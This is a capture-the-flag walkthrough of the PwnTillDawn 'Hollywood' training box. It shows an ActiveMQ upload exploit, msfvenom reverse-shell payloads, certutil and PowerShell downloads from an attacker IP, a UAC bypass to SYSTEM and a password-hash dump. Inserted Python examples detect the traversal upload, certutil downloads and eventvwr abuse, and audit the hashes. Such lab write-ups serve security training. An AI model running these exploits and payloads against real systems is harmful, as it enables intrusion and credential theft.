ptd-hollywood-private

As always, we start with an nmap scan of all TCP ports:

┌─[user@parrot-virtual]─[~/ptd]
└──╼ $nmap -Pn -p1-65535 10.150.150.219
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 08:55 BST
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 80.05% done; ETC: 08:56 (0:00:07 remaining)
Nmap scan report for 10.150.150.219
Host is up (0.032s latency).
Not shown: 65502 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
25/tcp    open  smtp
79/tcp    open  finger
80/tcp    open  http
105/tcp   open  csnet-ns
106/tcp   open  pop3pw
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
443/tcp   open  https
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
1883/tcp  open  mqtt
2224/tcp  open  efi-mg
2869/tcp  open  icslap
3306/tcp  open  mysql
5672/tcp  open  amqp
8009/tcp  open  ajp13
8080/tcp  open  http-proxy
8089/tcp  open  unknown
8161/tcp  open  patrol-snmp
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49251/tcp open  unknown
61613/tcp open  unknown
61614/tcp open  unknown
61616/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 37.57 seconds
┌─[user@parrot-virtual]─[~/ptd]
└──╼ $

 

Next we browse to http://10.150.150.219:8161/, which greets us with "Welcome to the Apache ActiveMQ!". There is a Metasploit exploit for it (a directory traversal upload):
https://www.exploit-db.com/exploits/42283

msf6 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.150.150.219         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.66.66.210     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Windows Java


msf6 exploit(windows/http/apache_activemq_traversal_upload) > run

[*] Started reverse TCP handler on 10.66.66.210:4444 
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[+] Payload executed!
[*] Command shell session 1 opened (10.66.66.210:4444 -> 10.150.150.219:49284) at 2020-08-26 09:18:27 +0100

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>whoami
whoami
hollywood\user

C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin>
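The foothold here is a write to the ActiveMQ fileserver servlet with a traversal sequence in the request path (the PATH option above). From the defender's side the same pattern is easy to spot in the Jetty access log. This is an added example, not part of the write-up: the log lines are constructed, and the NCSA-style line format is an assumption about how the log is configured.

```python
import re
from urllib.parse import unquote

# Constructed Jetty access-log lines in NCSA format (assumed log shape; not captured from the box).
SAMPLE_LOG = """\
10.66.66.210 - - [26/Aug/2020:09:17:55 +0100] "GET /admin/ HTTP/1.1" 200 1452
10.66.66.210 - - [26/Aug/2020:09:18:20 +0100] "PUT /fileserver/..\\admin\\xhGkq.jsp HTTP/1.1" 204 0
10.66.66.210 - - [26/Aug/2020:09:18:21 +0100] "GET /admin/xhGkq.jsp HTTP/1.1" 200 0
10.150.150.7 - - [26/Aug/2020:09:30:00 +0100] "GET /fileserver/readme.txt HTTP/1.1" 200 812
10.150.150.7 - - [26/Aug/2020:09:31:00 +0100] "GET /fileserver/..%5c..%5creadme.txt HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Methods that write through the fileserver servlet; a GET there is ordinary traffic.
WRITE_METHODS = {"PUT", "MOVE", "DELETE", "MKCOL"}


def has_traversal(target):
    """True if any path segment is '..' after dropping the query string and
    percent-decoding twice (catches %5c, %2f and double-encoded variants)."""
    path = unquote(unquote(target.split("?", 1)[0]))
    return ".." in re.split(r"[\\/]", path)


def scan(log_text):
    """Return (source, method, target, status, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        f = m.groupdict()
        reasons = []
        if f["method"] in WRITE_METHODS and f["target"].lower().startswith("/fileserver/"):
            reasons.append("write method to fileserver servlet")
        if has_traversal(f["target"]):
            reasons.append("path traversal in request target")
        if reasons:
            findings.append((f["src"], f["method"], f["target"], int(f["status"]), reasons))
    return findings


if __name__ == "__main__":
    for src, method, target, status, reasons in scan(SAMPLE_LOG):
        print(f"{src} {method} {target} -> {status}: {'; '.join(reasons)}")
```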

Next we create a Meterpreter executable with msfvenom and serve it from a Python web server so the target can fetch it with certutil:

┌─[user@parrot-virtual]─[~/Downloads]
└──╼ $msfvenom -p windows/meterpreter/reverse_tcp lhost=10.66.66.210 lport=7777 -f exe > 7777.exe


┌─[✗]─[user@parrot-virtual]─[~/Downloads]
└──╼ $sudo python3 -m http.server 80
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
10.150.150.219 - - [26/Aug/2020 09:25:00] "GET /7777.exe HTTP/1.1" 200 -
c:\puck>certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.

c:\puck>dir
dir
Volume in drive C has no label.
Volume Serial Number is 021A-9C32

Directory of c:\puck

08/26/2020 05:21 PM <DIR> .
08/26/2020 05:21 PM <DIR> ..
08/26/2020 05:21 PM 73,802 7777.exe
1 File(s) 73,802 bytes
2 Dir(s) 44,543,938,560 bytes free

c:\puck>

Start the multi/handler listener, then execute 7777.exe from the c:\puck shell in session 1:

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.66.66.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.210:7777 
msf6 exploit(multi/handler) >


msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type              Information                                                                       Connection
  --  ----  ----              -----------                                                                       ----------
  1         shell java/linux  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

c:\puck>7777.exe
7777.exe

c:\puck>
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 2 opened (10.66.66.210:7777 -> 10.150.150.219:49293) at 2020-08-26 09:32:53 +0100


c:\puck>
c:\puck>^Z
Background session 1? [y/N] y
msf6 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
  2         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > hashdump 
[-] 2007: Operation failed: The parameter is incorrect.
meterpreter > 


meterpreter > shell
Process 5088 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\puck>whoami
whoami
hollywood\user

c:\puck>
c:\puck>^Z
Background channel 1? [y/N] y
meterpreter > 
Background session 2? [y/N] 
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.150.150.219 - Collecting local exploits for x86/windows...

[*] 10.150.150.219 - 34 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/bypassuac_eventvwr) > set session 2
session => 2
msf6 exploit(windows/local/bypassuac_eventvwr) > run

[-] Handler failed to bind to 10.66.66.210:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\System32\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175174 bytes) to 10.150.150.219
[*] Meterpreter session 3 opened (10.66.66.210:4444 -> 10.150.150.219:49300) at 2020-08-26 09:44:50 +0100

[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_eventvwr) > 
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.66.66.210:4444 -> 10.150.150.219:49284 (10.150.150.219)
  2         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:7777 -> 10.150.150.219:49293 (10.150.150.219)
  3         meterpreter x86/windows  HOLLYWOOD\User @ HOLLYWOOD                                                        10.66.66.210:4444 -> 10.150.150.219:49300 (10.150.150.219)

msf6 exploit(windows/local/bypassuac_eventvwr) >
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 
4 0 System x86 0 
244 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
328 312 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
364 3876 xampp-control.exe x86 1 HOLLYWOOD\User C:\xampp\xampp-control.exe
400 3876 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
408 312 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 400 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
464 400 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
512 408 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
520 408 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
528 408 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
624 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
684 512 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
728 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
816 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
864 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
892 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
916 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1028 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1200 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1224 512 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1384 512 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1412 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1504 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1612 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
1664 512 splunkd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
1700 512 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1728 328 conhost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1760 512 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1816 512 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1832 624 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1880 364 mysqld.exe x86 1 HOLLYWOOD\User c:\xampp\mysql\bin\mysqld.exe
2240 512 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
2520 1664 splunk-winevtlog.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
2640 364 FileZillaServer.exe x86 1 HOLLYWOOD\User c:\xampp\filezillaftp\filezillaserver.exe
2676 364 mercury.exe x86 1 HOLLYWOOD\User c:\xampp\MercuryMail\mercury.exe
2748 400 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Oracle\Java\javapath\java.exe
2824 3876 jusched.exe x86 1 HOLLYWOOD\User C:\Program Files\Common Files\Java\Java Update\jusched.exe
2908 3916 httpd.exe x86 1 HOLLYWOOD\User C:\xampp\apache\bin\httpd.exe
2992 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3008 2748 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
3124 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3156 3876 vmtoolsd.exe x86 1 HOLLYWOOD\User C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3472 364 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\System32\cmd.exe
3548 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
3640 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3776 3472 java.exe x86 1 HOLLYWOOD\User C:\Program Files\Java\jre1.8.0_231\bin\java.exe
3820 512 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3840 864 dwm.exe x86 1 HOLLYWOOD\User C:\Windows\system32\Dwm.exe
3856 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
3876 3608 explorer.exe x86 1 HOLLYWOOD\User C:\Windows\Explorer.EXE
3916 364 httpd.exe x86 1 HOLLYWOOD\User c:\xampp\apache\bin\httpd.exe
3968 512 wmpnetwk.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
4080 512 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
4632 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
4824 512 taskhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\taskhost.exe
4912 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe
5004 3008 7777.exe x86 1 HOLLYWOOD\User c:\puck\7777.exe
5088 5004 cmd.exe x86 1 HOLLYWOOD\User C:\Windows\system32\cmd.exe
5356 4372 powershell.exe x86 1 HOLLYWOOD\User C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
5904 416 conhost.exe x86 1 HOLLYWOOD\User C:\Windows\system32\conhost.exe

meterpreter > migrate 3820
[*] Migrating from 5356 to 3820...
[*] Migration completed successfully.
meterpreter > shell
Process 5184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
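Two things in this chain stand out in process-creation telemetry: certutil being used as a downloader, and eventvwr.exe (which normally only launches mmc.exe to load its snap-in) spawning something else during the UAC bypass. This is an added example, not part of the write-up: the records below are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, User), which is an assumption about the log source, and the values are modelled on the commands shown above.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields
# (assumed log source; modelled on this write-up, not captured from the box).
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"HOLLYWOOD\User",
     "CommandLine": r"certutil -urlcache -split -f http://10.66.66.210/7777.exe c:\puck\7777.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "User": r"HOLLYWOOD\User", "CommandLine": r"certutil -hashfile c:\puck\notes.txt SHA256"},
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "User": r"HOLLYWOOD\User",
     "CommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"'},
    {"Image": r"C:\puck\7777.exe", "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "User": r"HOLLYWOOD\User", "CommandLine": r"C:\puck\7777.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"HOLLYWOOD\User",
     "CommandLine": r"powershell Invoke-WebRequest -OutFile C:\puck\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the detection reasons that fire for one process-creation record."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev["CommandLine"].lower()
    reasons = []
    # certutil pulling a remote URL into its cache is the download trick used above.
    if image == "certutil.exe" and re.search(r"[-/]urlcache", cmd) and URL_RE.search(cmd):
        reasons.append("certutil used as a downloader")
    # eventvwr.exe only ever launches mmc.exe; any other child is the UAC-bypass pattern.
    if parent == "eventvwr.exe" and image != "mmc.exe":
        reasons.append("unexpected child of eventvwr.exe (UAC bypass pattern)")
    # PowerShell writing a downloaded file to disk.
    if image == "powershell.exe" and "invoke-webrequest" in cmd and "-outfile" in cmd:
        reasons.append("PowerShell download to disk")
    return reasons


def scan(events):
    return [(basename(ev["Image"]), ev["User"], r) for ev in events for r in check_event(ev)]


if __name__ == "__main__":
    for image, user, reason in scan(EVENTS):
        print(f"[{user}] {image}: {reason}")
```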

With a SYSTEM shell we stage a few more tools on the box, using the same certutil trick (or PowerShell's Invoke-WebRequest), and dump the local password hashes with pwdump8:

certutil -urlcache -split -f http://10.66.66.210/fgdump.exe c:\puck\fgdump.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.exe c:\puck\winpeas.exe
certutil -urlcache -split -f http://10.66.66.210/winpeas.bat c:\puck\winpeas.bat
certutil -urlcache -split -f http://10.66.66.210/Chimichurri.exe c:\puck\Chimichurri.exe
certutil -urlcache -split -f http://10.66.66.210/pwdump8.exe c:\puck\pwdump8.exe

powershell Invoke-WebRequest -OutFile C:\Windows\System32\spool\drivers\color\pwdump7.exe -Uri http://10.66.66.210/pwdump7.exe

c:\puck>pwdump8.exe
pwdump8.exe

PwDump v8.2 – dumps windows password hashes – by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA

c:\puck>
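The dump above is worth reading rather than just feeding to a cracker: every account carries the placeholder LM hash (no LM hash stored), while Administrator and Guest carry the NT hash of the empty string. This is an added example, not part of the write-up, that parses pwdump-style lines and flags blank passwords, stored LM hashes and password reuse; the sample input is the dump shown above.

```python
import re

# The LM value stored when no LM hash exists, and the NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"[0-9a-f]{32}")

# Sample input: the pwdump8 lines from this write-up (user:rid:lmhash:nthash).
SAMPLE_DUMP = """\
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
User:1000:AAD3B435B51404EEAAD3B435B51404EE:F9E1A02072D330DDF77AD82CB54D5EC4
HomeGroupUser$:1002:AAD3B435B51404EEAAD3B435B51404EE:283C3C4DC5544A73569F35F22A5B1DCA
"""


def parse_pwdump(text):
    """Parse pwdump-style lines into dicts; anything that is not user:rid:lm:nt is skipped."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.fullmatch(lm) and HEX32.fullmatch(nt)):
            continue
        accounts.append({"name": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return accounts


def audit(accounts):
    """Return (account, finding) pairs a defender would act on."""
    findings = []
    by_nt = {}
    for a in accounts:
        if a["lm"] != EMPTY_LM:
            findings.append((a["name"], "real LM hash stored (legacy hash; disable LM hash storage)"))
        if a["nt"] == EMPTY_NT:
            who = " on built-in Administrator (RID 500)" if a["rid"] == 500 else ""
            findings.append((a["name"], "NT hash of empty string: blank or never-set password" + who))
        by_nt.setdefault(a["nt"], []).append(a["name"])
    # Identical non-empty NT hashes mean the same password on several accounts.
    for nt, names in by_nt.items():
        if nt != EMPTY_NT and len(names) > 1:
            findings.append((", ".join(names), "identical NT hash: password reuse"))
    return findings


if __name__ == "__main__":
    for name, finding in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{name}: {finding}")
```

On this box the empty Administrator hash most likely reflects the default disabled built-in account rather than a usable blank password, which is exactly the kind of context the audit output should be read with.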
A couple of other commands used to look around the box:

C:\Windows\system32>powershell -c Get-PSDrive
REG QUERY HKLM /v "EditionID" /s

Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.


One thought on "ptd-hollywood-private"

  1. Incredibly well written, amazing to follow.

    Would you know why msf is coming back with "failed upload", for example? It happened countless times.
